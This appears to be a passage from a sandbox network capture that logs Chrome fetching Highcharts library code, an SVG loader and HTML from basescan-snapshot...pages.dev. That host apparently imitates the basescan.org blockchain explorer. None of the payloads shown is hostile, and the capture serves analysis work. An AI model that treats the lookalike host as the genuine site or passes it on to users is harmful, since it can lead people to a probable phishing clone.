                                                                                                                                                                                                                                              CF-RAY: 8c9fe2ef7f83c338-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC508INData Raw: 37 63 33 63 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 54 2c 4b 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 54 2e 64 6f 63 75 6d 65 6e 74 3f 4b 28 54 29 3a 4b 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4b 28 54 29 7d 29 3a 54 2e 48 69 67 68 63 68 61 72 74 73 3d 4b 28 54 29 7d 29 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 54 29 7b 76 61 72 20 4b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b
                                                                                                                                                                                                                                              Data Ascii: 7c3c(function(T,K){"object"===typeof module&&module.exports?module.exports=T.document?K(T):K:"function"===typeof define&&define.amd?define(function(){return K(T)}):T.Highcharts=K(T)})("undefined"!==typeof window?window:this,function(T){var K=function(){
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 78 22 29 2c 65 3d 2d 31 21 3d 3d 45 2e 69 6e 64 65 78 4f 66 28 22 43 68 72 6f 6d 65 22 29 2c 74 3d 68 26 26 34 3e 70 61 72 73 65 49 6e 74 28 45 2e 73 70 6c 69 74 28 22 46 69 72 65 66 6f 78 2f 22 29 5b 31 5d 2c 31 30 29 3b 72 65 74 75 72 6e 20 61 2e 48 69 67 68 63 68 61 72 74 73 3f 61 2e 48 69 67 68 63 68 61 72 74 73 2e 65 72 72 6f 72 28 31 36 2c 21 30 29 3a 7b 70 72 6f 64 75 63 74 3a 22 48 69 67 68 63 68 61 72 74 73 22 2c 76 65 72 73 69 6f 6e 3a 22 36 2e 31 2e 34 22 2c 64 65 67 32 72 61 64 3a 32 2a 4d 61 74 68 2e 50 49 2f 33 36 30 2c 64 6f 63 3a 43 2c 68 61 73 42 69 64 69 42 75 67 3a 74 2c 68 61 73 54 6f 75 63 68 3a 43 26 26 76 6f 69 64 20 30 21 3d 3d 43 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 6f 6e 74 6f 75 63 68 73 74 61 72 74 2c 69 73 4d 53
                                                                                                                                                                                                                                              Data Ascii: x"),e=-1!==E.indexOf("Chrome"),t=h&&4>parseInt(E.split("Firefox/")[1],10);return a.Highcharts?a.Highcharts.error(16,!0):{product:"Highcharts",version:"6.1.4",deg2rad:2*Math.PI/360,doc:C,hasBidiBug:t,hasTouch:C&&void 0!==C.documentElement.ontouchstart,isMS
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 70 2e 73 74 6f 70 70 65 64 3f 21 31 3a 74 2e 73 74 65 70 28 61 29 7d 2c 75 3d 46 2e 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 7c 7c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 2c 31 33 29 7d 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 63 3d 30 3b 63 3c 61 2e 74 69 6d 65 72 73 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 61 2e 74 69 6d 65 72 73 5b 63 5d 28 29 7c 7c 61 2e 74 69 6d 65 72 73 2e 73 70 6c 69 63 65 28 63 2d 2d 2c 31 29 3b 61 2e 74 69 6d 65 72 73 2e 6c 65 6e 67 74 68 26 26 75 28 66 29 7d 3b 6d 21 3d 3d 68 7c 7c 74 68 69 73 2e 65 6c 65 6d 5b 22 66 6f 72 63 65 41 6e 69 6d 61 74 65 3a 22 2b 74 68 69 73 2e 70 72 6f 70 5d 3f 28 74 68 69 73 2e 73
                                                                                                                                                                                                                                              Data Ascii: tion(a){return p.stopped?!1:t.step(a)},u=F.requestAnimationFrame||function(a){setTimeout(a,13)},f=function(){for(var c=0;c<a.timers.length;c++)a.timers[c]()||a.timers.splice(c--,1);a.timers.length&&u(f)};m!==h||this.elem["forceAnimate:"+this.prop]?(this.s
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 28 64 5b 72 2d 36 5d 3d 64 5b 72 2d 32 5d 2c 64 5b 72 2d 35 5d 3d 64 5b 72 2d 31 5d 29 2c 5b 5d 2e 73 70 6c 69 63 65 2e 61 70 70 6c 79 28 61 2c 5b 61 2e 6c 65 6e 67 74 68 2f 71 2c 30 5d 2e 63 6f 6e 63 61 74 28 64 29 29 2c 76 26 26 63 2d 2d 7d 68 3d 68 7c 7c 22 22 3b 76 61 72 20 75 2c 66 3d 6d 2e 73 74 61 72 74 58 2c 63 3d 6d 2e 65 6e 64 58 2c 6b 3d 2d 31 3c 68 2e 69 6e 64 65 78 4f 66 28 22 43 22 29 2c 72 3d 6b 3f 37 3a 33 2c 6c 2c 64 2c 62 3b 68 3d 68 2e 73 70 6c 69 74 28 22 20 22 29 3b 65 3d 65 2e 73 6c 69 63 65 28 29 3b 76 61 72 20 76 3d 6d 2e 69 73 41 72 65 61 2c 71 3d 76 3f 32 3a 31 2c 49 3b 6b 26 26 28 74 28 68 29 2c 74 28 65 29 29 3b 69 66 28 66 26 26 63 29 7b 66 6f 72 28 62 3d 30 3b 62 3c 66 2e 6c 65 6e 67 74 68 3b 62 2b 2b 29 69 66 28 66 5b 62 5d
                                                                                                                                                                                                                                              Data Ascii: (d[r-6]=d[r-2],d[r-5]=d[r-1]),[].splice.apply(a,[a.length/q,0].concat(d)),v&&c--}h=h||"";var u,f=m.startX,c=m.endX,k=-1<h.indexOf("C"),r=k?7:3,l,d,b;h=h.split(" ");e=e.slice();var v=m.isArea,q=v?2:1,I;k&&(t(h),t(e));if(f&&c){for(b=0;b<f.length;b++)if(f[b]
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 62 6a 65 63 74 28 6d 2c 21 30 29 7c 7c 61 2e 69 73 44 4f 4d 45 6c 65 6d 65 6e 74 28 6d 29 7c 7c 21 68 7c 7c 21 68 2e 6e 61 6d 65 7c 7c 22 4f 62 6a 65 63 74 22 3d 3d 3d 68 2e 6e 61 6d 65 29 7d 3b 61 2e 69 73 4e 75 6d 62 65 72 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 22 6e 75 6d 62 65 72 22 3d 3d 3d 74 79 70 65 6f 66 20 61 26 26 21 69 73 4e 61 4e 28 61 29 26 26 49 6e 66 69 6e 69 74 79 3e 61 26 26 2d 49 6e 66 69 6e 69 74 79 3c 61 7d 3b 61 2e 65 72 61 73 65 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 68 29 7b 66 6f 72 28 76 61 72 20 65 3d 61 2e 6c 65 6e 67 74 68 3b 65 2d 2d 3b 29 69 66 28 61 5b 65 5d 3d 3d 3d 68 29 7b 61 2e 73 70 6c 69 63 65 28 65 2c 31 29 3b 62 72 65 61 6b 7d 7d 3b 61 2e 64 65 66 69 6e 65 64 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72
                                                                                                                                                                                                                                              Data Ascii: bject(m,!0)||a.isDOMElement(m)||!h||!h.name||"Object"===h.name)};a.isNumber=function(a){return"number"===typeof a&&!isNaN(a)&&Infinity>a&&-Infinity<a};a.erase=function(a,h){for(var e=a.length;e--;)if(a[e]===h){a.splice(e,1);break}};a.defined=function(a){r
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 28 65 7c 7c 30 29 2b 61 7d 3b 61 2e 72 65 6c 61 74 69 76 65 4c 65 6e 67 74 68 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 68 2c 65 29 7b 72 65 74 75 72 6e 2f 25 24 2f 2e 74 65 73 74 28 61 29 3f 68 2a 70 61 72 73 65 46 6c 6f 61 74 28 61 29 2f 31 30 30 2b 28 65 7c 7c 30 29 3a 70 61 72 73 65 46 6c 6f 61 74 28 61 29 7d 3b 61 2e 77 72 61 70 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 68 2c 65 29 7b 76 61 72 20 6d 3d 61 5b 68 5d 3b 61 5b 68 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 2c 70 3d 61 72 67 75 6d 65 6e 74 73 2c 75 3d 74 68 69 73 3b 75 2e 70 72 6f 63 65 65 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6d 2e 61 70 70 6c 79 28 75 2c 61 72 67 75 6d 65 6e
                                                                                                                                                                                                                                              Data Ascii: (e||0)+a};a.relativeLength=function(a,h,e){return/%$/.test(a)?h*parseFloat(a)/100+(e||0):parseFloat(a)};a.wrap=function(a,h,e){var m=a[h];a[h]=function(){var a=Array.prototype.slice.call(arguments),p=arguments,u=this;u.proceed=function(){m.apply(u,argumen
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 6c 65 6e 67 74 68 2c 6d 2c 78 3b 66 6f 72 28 78 3d 30 3b 78 3c 65 3b 78 2b 2b 29 61 5b 78 5d 2e 73 61 66 65 49 3d 78 3b 61 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 61 2c 65 29 7b 6d 3d 68 28 61 2c 65 29 3b 72 65 74 75 72 6e 20 30 3d 3d 3d 6d 3f 61 2e 73 61 66 65 49 2d 65 2e 73 61 66 65 49 3a 6d 7d 29 3b 66 6f 72 28 78 3d 30 3b 78 3c 65 3b 78 2b 2b 29 64 65 6c 65 74 65 20 61 5b 78 5d 2e 73 61 66 65 49 7d 3b 61 2e 61 72 72 61 79 4d 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 68 3d 61 2e 6c 65 6e 67 74 68 2c 65 3d 61 5b 30 5d 3b 68 2d 2d 3b 29 61 5b 68 5d 3c 65 26 26 28 65 3d 61 5b 68 5d 29 3b 72 65 74 75 72 6e 20 65 7d 3b 61 2e 61 72 72 61 79 4d 61 78 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 68 3d 61 2e 6c
                                                                                                                                                                                                                                              Data Ascii: length,m,x;for(x=0;x<e;x++)a[x].safeI=x;a.sort(function(a,e){m=h(a,e);return 0===m?a.safeI-e.safeI:m});for(x=0;x<e;x++)delete a[x].safeI};a.arrayMin=function(a){for(var h=a.length,e=a[0];h--;)a[h]<e&&(e=a[h]);return e};a.arrayMax=function(a){for(var h=a.l
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 70 69 63 6b 28 65 2c 78 2e 64 65 63 69 6d 61 6c 50 6f 69 6e 74 29 3b 74 3d 61 2e 70 69 63 6b 28 74 2c 78 2e 74 68 6f 75 73 61 6e 64 73 53 65 70 29 3b 6d 3d 28 30 3e 6d 3f 22 2d 22 3a 22 22 29 2b 28 75 3f 70 2e 73 75 62 73 74 72 28 30 2c 75 29 2b 74 3a 22 22 29 3b 6d 2b 3d 70 2e 73 75 62 73 74 72 28 75 29 2e 72 65 70 6c 61 63 65 28 2f 28 5c 64 7b 33 7d 29 28 3f 3d 5c 64 29 2f 67 2c 22 24 31 22 2b 74 29 3b 68 26 26 28 6d 2b 3d 65 2b 66 2e 73 6c 69 63 65 28 2d 68 29 29 3b 63 5b 31 5d 26 26 30 21 3d 3d 2b 6d 26 26 28 6d 2b 3d 22 65 22 2b 63 5b 31 5d 29 3b 72 65 74 75 72 6e 20 6d 7d 3b 4d 61 74 68 2e 65 61 73 65 49 6e 4f 75 74 53 69 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 2d 2e 35 2a 28 4d 61 74 68 2e 63 6f 73 28 4d 61 74 68 2e 50 49 2a
                                                                                                                                                                                                                                              Data Ascii: pick(e,x.decimalPoint);t=a.pick(t,x.thousandsSep);m=(0>m?"-":"")+(u?p.substr(0,u)+t:"");m+=p.substr(u).replace(/(\d{3})(?=\d)/g,"$1"+t);h&&(m+=e+f.slice(-h));c[1]&&0!==+m&&(m+="e"+c[1]);return m};Math.easeInOutSine=function(a){return-.5*(Math.cos(Math.PI*
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 68 3d 45 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 61 3d 61 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 7c 7c 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3f 61 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 3a 7b 74 6f 70 3a 30 2c 6c 65 66 74 3a 30 7d 3b 72 65 74 75 72 6e 7b 74 6f 70 3a 61 2e 74 6f 70 2b 28 46 2e 70 61 67 65 59 4f 66 66 73 65 74 7c 7c 68 2e 73 63 72 6f 6c 6c 54 6f 70 29 2d 28 68 2e 63 6c 69 65 6e 74 54 6f 70 7c 7c 30 29 2c 6c 65 66 74 3a 61 2e 6c 65 66 74 2b 28 46 2e 70 61 67 65 58 4f 66 66 73 65 74 7c 7c 68 2e 73 63 72 6f 6c 6c 4c 65 66 74 29 2d 28 68 2e 63 6c 69 65 6e 74 4c 65 66 74 7c 7c 30 29 7d 7d 3b 61 2e 73 74 6f 70 3d 66 75 6e 63 74 69 6f 6e 28 6d 2c 68 29 7b 66 6f
                                                                                                                                                                                                                                              Data Ascii: nction(a){var h=E.documentElement;a=a.parentElement||a.parentNode?a.getBoundingClientRect():{top:0,left:0};return{top:a.top+(F.pageYOffset||h.scrollTop)-(h.clientTop||0),left:a.left+(F.pageXOffset||h.scrollLeft)-(h.clientLeft||0)}};a.stop=function(m,h){fo
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 31 3c 75 26 26 28 70 2e 73 70 6c 69 63 65 28 75 2c 31 29 2c 63 5b 68 5d 3d 70 29 2c 74 28 68 2c 65 29 29 3a 28 78 28 63 29 2c 63 5b 68 5d 3d 5b 5d 29 29 3a 28 78 28 63 29 2c 6d 5b 66 5d 3d 7b 7d 29 29 7d 29 7d 3b 61 2e 66 69 72 65 45 76 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 6d 2c 68 2c 65 2c 74 29 7b 76 61 72 20 78 2c 70 2c 75 2c 66 2c 63 3b 65 3d 65 7c 7c 7b 7d 3b 45 2e 63 72 65 61 74 65 45 76 65 6e 74 26 26 28 6d 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 7c 7c 6d 2e 66 69 72 65 45 76 65 6e 74 29 3f 28 78 3d 45 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 45 76 65 6e 74 73 22 29 2c 78 2e 69 6e 69 74 45 76 65 6e 74 28 68 2c 21 30 2c 21 30 29 2c 61 2e 65 78 74 65 6e 64 28 78 2c 65 29 2c 6d 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 3f 6d 2e 64 69 73 70 61 74
                                                                                                                                                                                                                                              Data Ascii: 1<u&&(p.splice(u,1),c[h]=p),t(h,e)):(x(c),c[h]=[])):(x(c),m[f]={}))})};a.fireEvent=function(m,h,e,t){var x,p,u,f,c;e=e||{};E.createEvent&&(m.dispatchEvent||m.fireEvent)?(x=E.createEvent("Events"),x.initEvent(h,!0,!0),a.extend(x,e),m.dispatchEvent?m.dispat


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              137192.168.2.549888104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC651OUTGET /images/main/loadingblock.svg HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC806INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:09 GMT
                                                                                                                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                                                                                                                              Content-Length: 2315
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Mon, 15 May 2023 02:33:00 GMT
                                                                                                                                                                                                                                              ETag: "056d290d586d91:0"
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 421870
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gm%2BMN2yFhPqEAyb2d%2BHOGPKqXfa98x7oQK%2B6%2Bpy3hIFx5OtdEaNXPXOqJO9z2KCg57ZdSbeX08cKRA1qTtU7X20eWS221MCThYSzJz%2Fgd%2Fdu8XHDvPMmLIt7N%2Ffuqw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2efdfa64285-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC563INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 77 69 64 74 68 3d 22 36 32 22 20 68 65 69 67 68 74 3d 22 36 32 22 20 70 72 65 73 65 72 76 65 41 73 70 65 63 74 52 61 74 69 6f 3d 22 78 4d 69 64 59 4d 69 64 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6e 6f 6e 65 3b 22 3e 3c 72 65 63 74 20 69 64 3d 22 62 61 63 6b 67 72 6f 75 6e 64 72 65 63 74 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 78 3d 22 30 22 20 79 3d 22 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 6e 6f 6e 65 22 2f 3e
                                                                                                                                                                                                                                              Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="62" height="62" preserveAspectRatio="xMidYMid" style="background: none;"><rect id="backgroundrect" width="100%" height="100%" x="0" y="0" fill="none" stroke="none"/>
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 20 79 3d 22 30 22 20 77 69 64 74 68 3d 22 32 30 22 20 68 65 69 67 68 74 3d 22 32 30 22 20 66 69 6c 6c 3d 22 23 31 64 33 66 37 32 22 20 69 64 3d 22 73 76 67 5f 32 22 20 63 6c 61 73 73 3d 22 22 3e 0d 0a 20 20 3c 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 22 66 69 6c 6c 22 20 76 61 6c 75 65 73 3d 22 23 35 36 39 39 64 32 3b 23 31 64 33 66 37 32 3b 23 31 64 33 66 37 32 22 20 6b 65 79 54 69 6d 65 73 3d 22 30 3b 30 2e 31 32 35 3b 31 22 20 64 75 72 3d 22 31 2e 36 73 22 20 72 65 70 65 61 74 43 6f 75 6e 74 3d 22 69 6e 64 65 66 69 6e 69 74 65 22 20 62 65 67 69 6e 3d 22 30 2e 32 73 22 20 63 61 6c 63 4d 6f 64 65 3d 22 64 69 73 63 72 65 74 65 22 2f 3e 0d 0a 3c 2f 72 65 63 74 3e 3c 72 65 63 74 20 78 3d 22 34 32 22 20 79 3d 22 30 22 20 77 69 64 74
                                                                                                                                                                                                                                              Data Ascii: y="0" width="20" height="20" fill="#1d3f72" id="svg_2" class=""> <animate attributeName="fill" values="#5699d2;#1d3f72;#1d3f72" keyTimes="0;0.125;1" dur="1.6s" repeatCount="indefinite" begin="0.2s" calcMode="discrete"/></rect><rect x="42" y="0" widt
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC383INData Raw: 75 65 73 3d 22 23 35 36 39 39 64 32 3b 23 31 64 33 66 37 32 3b 23 31 64 33 66 37 32 22 20 6b 65 79 54 69 6d 65 73 3d 22 30 3b 30 2e 31 32 35 3b 31 22 20 64 75 72 3d 22 31 2e 36 73 22 20 72 65 70 65 61 74 43 6f 75 6e 74 3d 22 69 6e 64 65 66 69 6e 69 74 65 22 20 62 65 67 69 6e 3d 22 31 73 22 20 63 61 6c 63 4d 6f 64 65 3d 22 64 69 73 63 72 65 74 65 22 2f 3e 0d 0a 3c 2f 72 65 63 74 3e 3c 72 65 63 74 20 78 3d 22 34 32 22 20 79 3d 22 34 32 22 20 77 69 64 74 68 3d 22 32 30 22 20 68 65 69 67 68 74 3d 22 32 30 22 20 66 69 6c 6c 3d 22 23 31 64 33 66 37 32 22 20 69 64 3d 22 73 76 67 5f 38 22 20 63 6c 61 73 73 3d 22 22 3e 0d 0a 20 20 3c 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 22 66 69 6c 6c 22 20 76 61 6c 75 65 73 3d 22 23 35 36 39 39 64 32
                                                                                                                                                                                                                                              Data Ascii: ues="#5699d2;#1d3f72;#1d3f72" keyTimes="0;0.125;1" dur="1.6s" repeatCount="indefinite" begin="1s" calcMode="discrete"/></rect><rect x="42" y="42" width="20" height="20" fill="#1d3f72" id="svg_8" class=""> <animate attributeName="fill" values="#5699d2


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              138192.168.2.549889172.66.47.854435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC899OUTGET /assets/js/custom/commonjs_token.js?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
                                                                                                                                                                                                                                              X-Requested-With: XMLHttpRequest
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/dist/website
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC799INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:09 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                              referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tyVoKkVxBHBR%2B%2FbjO2gJNcepPWn%2F22oSJMDWciiDk7zXBOmexNsFZ%2BCzaYvEjtdECe%2Bm2a6GJ20mNW3Fa0tfltEwvTezZ4JJ2GJ1nl%2FwXsZvijAqKnI3J5U6ddREAieqsxHKXXaOEvlZPwdQjbBzpGZcNFxBhgSEzeJuyuZeTUPBohsbboeSL4KpcrHWRcGGjPrWpzKc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2f0c9bb436c-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 32 33 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 30 30
                                                                                                                                                                                                                                              Data Ascii: 239d<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8" /> <link rel="shortcut icon" href="favicon.ico" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta name="theme-color" content="#0000
